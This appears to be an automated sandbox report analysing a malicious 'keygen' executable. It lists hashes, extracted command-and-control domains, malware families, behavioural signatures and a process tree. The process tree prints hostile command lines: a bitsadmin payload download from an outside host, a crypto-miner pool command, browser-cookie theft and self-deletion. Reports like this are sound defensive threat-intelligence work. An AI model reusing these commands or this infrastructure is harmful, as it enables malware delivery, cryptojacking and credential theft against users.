Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    63s
  • max time network
    223s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    27-04-2021 05:35

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 42 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:1816
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:1204
      • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
        "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
        1⤵
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of WriteProcessMemory
        PID:756
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
          2⤵
          • Executes dropped EXE
          • Drops file in Program Files directory
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1352
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
            3⤵
            • Loads dropped DLL
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1940
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:560
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1360
          • C:\Users\Admin\AppData\Local\Temp\is-033G3.tmp\Install.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-033G3.tmp\Install.tmp" /SL5="$3017A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1688
            • C:\Users\Admin\AppData\Local\Temp\is-8IS29.tmp\Ultra.exe
              "C:\Users\Admin\AppData\Local\Temp\is-8IS29.tmp\Ultra.exe" /S /UID=burnerch1
              4⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Modifies system certificate store
              • Suspicious use of WriteProcessMemory
              PID:1784
              • C:\Program Files\Windows Defender\CWRJIMEZEM\ultramediaburner.exe
                "C:\Program Files\Windows Defender\CWRJIMEZEM\ultramediaburner.exe" /VERYSILENT
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1956
                • C:\Users\Admin\AppData\Local\Temp\is-VAG9H.tmp\ultramediaburner.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-VAG9H.tmp\ultramediaburner.tmp" /SL5="$20188,281924,62464,C:\Program Files\Windows Defender\CWRJIMEZEM\ultramediaburner.exe" /VERYSILENT
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:1804
                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                    7⤵
                    • Executes dropped EXE
                    PID:2028
              • C:\Users\Admin\AppData\Local\Temp\a2-08bca-b3a-2d5b6-4226afe378e6a\ZHolegaeqaegae.exe
                "C:\Users\Admin\AppData\Local\Temp\a2-08bca-b3a-2d5b6-4226afe378e6a\ZHolegaeqaegae.exe"
                5⤵
                • Executes dropped EXE
                PID:1716
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                  6⤵
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Modifies Internet Explorer settings
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:1784
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1784 CREDAT:275457 /prefetch:2
                    7⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:1708
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 2324
                      8⤵
                      • Program crash
                      PID:1408
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1784 CREDAT:734222 /prefetch:2
                    7⤵
                    • Modifies Internet Explorer settings
                    • NTFS ADS
                    • Suspicious use of SetWindowsHookEx
                    PID:2556
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1784 CREDAT:1127439 /prefetch:2
                    7⤵
                      PID:2392
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 1396
                        8⤵
                        • Executes dropped EXE
                        • Program crash
                        PID:2772
                • C:\Users\Admin\AppData\Local\Temp\a1-19a56-da6-d7aa4-cad7366355ebd\Locaegaekixae.exe
                  "C:\Users\Admin\AppData\Local\Temp\a1-19a56-da6-d7aa4-cad7366355ebd\Locaegaekixae.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:1980
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ylea1vwf.x2z\instEU.exe & exit
                    6⤵
                      PID:1000
                      • C:\Users\Admin\AppData\Local\Temp\ylea1vwf.x2z\instEU.exe
                        C:\Users\Admin\AppData\Local\Temp\ylea1vwf.x2z\instEU.exe
                        7⤵
                        • Loads dropped DLL
                        PID:1412
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\crmbyode.omj\requête.exe & exit
                      6⤵
                        PID:2568
                        • C:\Users\Admin\AppData\Local\Temp\crmbyode.omj\requête.exe
                          C:\Users\Admin\AppData\Local\Temp\crmbyode.omj\requête.exe
                          7⤵
                            PID:2400
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                              8⤵
                                PID:2684
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                  parse.exe -f json -b chrome
                                  9⤵
                                    PID:1508
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                    parse.exe -f json -b edge
                                    9⤵
                                      PID:2912
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                      parse.exe -f json -b firefox
                                      9⤵
                                        PID:2860
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x3l1lycq.yts\google-game.exe & exit
                                  6⤵
                                    PID:3056
                                    • C:\Users\Admin\AppData\Local\Temp\x3l1lycq.yts\google-game.exe
                                      C:\Users\Admin\AppData\Local\Temp\x3l1lycq.yts\google-game.exe
                                      7⤵
                                        PID:2612
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                          8⤵
                                            PID:1292
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y3m0mtvj.y13\askinstall39.exe & exit
                                        6⤵
                                          PID:2628
                                          • C:\Users\Admin\AppData\Local\Temp\y3m0mtvj.y13\askinstall39.exe
                                            C:\Users\Admin\AppData\Local\Temp\y3m0mtvj.y13\askinstall39.exe
                                            7⤵
                                              PID:268
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:3020
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:2224
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\co523yrw.z1a\SunLabsPlayer.exe /S & exit
                                              6⤵
                                                PID:2424
                                                • C:\Users\Admin\AppData\Local\Temp\co523yrw.z1a\SunLabsPlayer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\co523yrw.z1a\SunLabsPlayer.exe /S
                                                  7⤵
                                                    PID:2976
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnE64B.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:2592
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnE64B.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:2084
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnE64B.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:2860
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnE64B.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:1940
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnE64B.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:1072
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnE64B.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:1568
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnE64B.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2632
                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                    8⤵
                                                                    • Download via BitsAdmin
                                                                    PID:3008
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b5zyviru.mya\inst.exe & exit
                                                                6⤵
                                                                  PID:2896
                                                                  • C:\Users\Admin\AppData\Local\Temp\b5zyviru.mya\inst.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\b5zyviru.mya\inst.exe
                                                                    7⤵
                                                                      PID:2616
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vew4jsaq.k12\GcleanerWW.exe /mixone & exit
                                                                    6⤵
                                                                    • Blocklisted process makes network request
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:1412
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nfpylogl.kcs\toolspab1.exe & exit
                                                                    6⤵
                                                                      PID:2368
                                                                      • C:\Users\Admin\AppData\Local\Temp\nfpylogl.kcs\toolspab1.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\nfpylogl.kcs\toolspab1.exe
                                                                        7⤵
                                                                          PID:1568
                                                                          • C:\Users\Admin\AppData\Local\Temp\nfpylogl.kcs\toolspab1.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\nfpylogl.kcs\toolspab1.exe
                                                                            8⤵
                                                                              PID:2772
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2hfy2wc0.day\app.exe /8-2222 & exit
                                                                          6⤵
                                                                            PID:2228
                                                                            • C:\Users\Admin\AppData\Local\Temp\2hfy2wc0.day\app.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\2hfy2wc0.day\app.exe /8-2222
                                                                              7⤵
                                                                                PID:2216
                                                                                • C:\Users\Admin\AppData\Local\Temp\2hfy2wc0.day\app.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\2hfy2wc0.day\app.exe" /8-2222
                                                                                  8⤵
                                                                                    PID:2220
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\np1fm4fy.nao\c7ae36fa.exe & exit
                                                                                6⤵
                                                                                  PID:2236
                                                                                  • C:\Users\Admin\AppData\Local\Temp\np1fm4fy.nao\c7ae36fa.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\np1fm4fy.nao\c7ae36fa.exe
                                                                                    7⤵
                                                                                      PID:2604
                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:1412
                                                                            • C:\Users\Admin\AppData\Roaming\231C.tmp.exe
                                                                              "C:\Users\Admin\AppData\Roaming\231C.tmp.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:2072
                                                                              • C:\Users\Admin\AppData\Roaming\231C.tmp.exe
                                                                                "C:\Users\Admin\AppData\Roaming\231C.tmp.exe"
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Checks processor information in registry
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:2208
                                                                            • C:\Users\Admin\AppData\Roaming\2761.tmp.exe
                                                                              "C:\Users\Admin\AppData\Roaming\2761.tmp.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              • Suspicious use of SetThreadContext
                                                                              • Modifies system certificate store
                                                                              PID:2116
                                                                              • C:\Windows\system32\msiexec.exe
                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w10128@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                4⤵
                                                                                  PID:2592
                                                                              • C:\Users\Admin\AppData\Roaming\2A20.tmp.exe
                                                                                "C:\Users\Admin\AppData\Roaming\2A20.tmp.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • Adds Run key to start application
                                                                                PID:2144
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                3⤵
                                                                                  PID:2412
                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                    ping 127.0.0.1
                                                                                    4⤵
                                                                                    • Runs ping.exe
                                                                                    PID:2456
                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                2⤵
                                                                                  PID:2772
                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                  2⤵
                                                                                    PID:2508
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      3⤵
                                                                                        PID:2940
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        3⤵
                                                                                          PID:2880
                                                                                    • C:\Users\Admin\AppData\Local\Temp\C68A.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\C68A.exe
                                                                                      1⤵
                                                                                        PID:2204

                                                                                      Network

                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                      Persistence

                                                                                      Registry Run Keys / Startup Folder

                                                                                      1
                                                                                      T1060

                                                                                      BITS Jobs

                                                                                      1
                                                                                      T1197

                                                                                      Defense Evasion

                                                                                      Modify Registry

                                                                                      3
                                                                                      T1112

                                                                                      BITS Jobs

                                                                                      1
                                                                                      T1197

                                                                                      Install Root Certificate

                                                                                      1
                                                                                      T1130

                                                                                      Credential Access

                                                                                      Credentials in Files

                                                                                      3
                                                                                      T1081

                                                                                      Discovery

                                                                                      Query Registry

                                                                                      2
                                                                                      T1012

                                                                                      System Information Discovery

                                                                                      3
                                                                                      T1082

                                                                                      Remote System Discovery

                                                                                      1
                                                                                      T1018

                                                                                      Collection

                                                                                      Data from Local System

                                                                                      3
                                                                                      T1005

                                                                                      Command and Control

                                                                                      Web Service

                                                                                      1
                                                                                      T1102

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                        MD5

                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                        SHA1

                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                        SHA256

                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                        SHA512

                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                        MD5

                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                        SHA1

                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                        SHA256

                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                        SHA512

                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                      • C:\Program Files\Windows Defender\CWRJIMEZEM\ultramediaburner.exe
                                                                                        MD5

                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                        SHA1

                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                        SHA256

                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                        SHA512

                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                      • C:\Program Files\Windows Defender\CWRJIMEZEM\ultramediaburner.exe
                                                                                        MD5

                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                        SHA1

                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                        SHA256

                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                        SHA512

                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                      • C:\Program Files\install.dat
                                                                                        MD5

                                                                                        806c3221a013fec9530762750556c332

                                                                                        SHA1

                                                                                        36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                        SHA256

                                                                                        9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                        SHA512

                                                                                        56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                      • C:\Program Files\install.dll
                                                                                        MD5

                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                        SHA1

                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                        SHA256

                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                        SHA512

                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                        MD5

                                                                                        5ac02a6c6de83284b09a466b285a5246

                                                                                        SHA1

                                                                                        6dc3332e8b38e7c982f61c0a29114abf5f8b40f6

                                                                                        SHA256

                                                                                        7552069b3c95c3dd741c495642385e103a8227e59769a60e39d9fcf98e4b09fb

                                                                                        SHA512

                                                                                        0f90b2ea8dd5a161d762ab9139436b19661f8e83ec727dd7f73020cba42615c967c8ce1c2e19e19efc5396b06b356c11af56e5b059d63f0248787893d077ca3f

                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                        MD5

                                                                                        b60fada0bd079e13914f40da15a8bd19

                                                                                        SHA1

                                                                                        69ea1bd9e3c9dbe723a5bd5e6ca6cd43d6b13832

                                                                                        SHA256

                                                                                        7a1f3e0ef6fc9ece36854cfd7288d56faecacb3d67125bd65c8697f50a681020

                                                                                        SHA512

                                                                                        12d7b097b7c3d3acb0e914452745f2dfa8a9e9a61b25e56432be8a25957d8209bd6ec5cb7f3bd6ded301054c1f9d66f046f99fe4382568f30423fd0288f3c2cf

                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                        MD5

                                                                                        7df124fa9f5d6a67949dd77b2b2c1c58

                                                                                        SHA1

                                                                                        61bdd347363a6ffff330233b92044b04106c77e8

                                                                                        SHA256

                                                                                        2247f6274f6ac96faf2054dccd3283eeeeeafc25934cebbe2fc0edc97ef2b4dc

                                                                                        SHA512

                                                                                        561fd0bca84cc8aa2db1c311104321cd1a0a3e49349ed0d556538a9fd0d34ec8a78060155d91694fe00f208b69417a36d9b15a5b4002bcf016c8cda772bf110f

                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                        MD5

                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                        SHA1

                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                        SHA256

                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                        SHA512

                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                        MD5

                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                        SHA1

                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                        SHA256

                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                        SHA512

                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                        MD5

                                                                                        3b1b318df4d314a35dce9e8fd89e5121

                                                                                        SHA1

                                                                                        55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                        SHA256

                                                                                        4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                        SHA512

